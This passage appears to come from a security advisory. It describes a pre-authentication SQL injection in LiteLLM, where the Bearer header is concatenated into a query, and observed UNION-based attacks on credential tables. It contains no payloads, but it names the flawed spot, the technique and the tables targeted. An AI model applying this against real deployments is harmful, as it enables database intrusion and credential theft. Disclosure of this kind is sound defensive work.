The vulnerability exists in LiteLLM’s authentication flow, where the Authorization: Bearer header is directly concatenated into a SQL query without proper parameterization. This flaw allows attackers to inject arbitrary SQL statements prior to authentication, enabling direct access to the underlying PostgreSQL database.
Observed exploitation attempts demonstrate targeted schema enumeration rather than generic scanning. Attackers leveraged UNION-based SQL injection payloads to extract sensitive data from key tables, including litellm_credentials, litellm_config, and LiteLLM_VerificationToken. The activity included column-count discovery techniques and deliberate querying of high-value data sources, indicating prior knowledge of LiteLLM’s schema and credential storage model.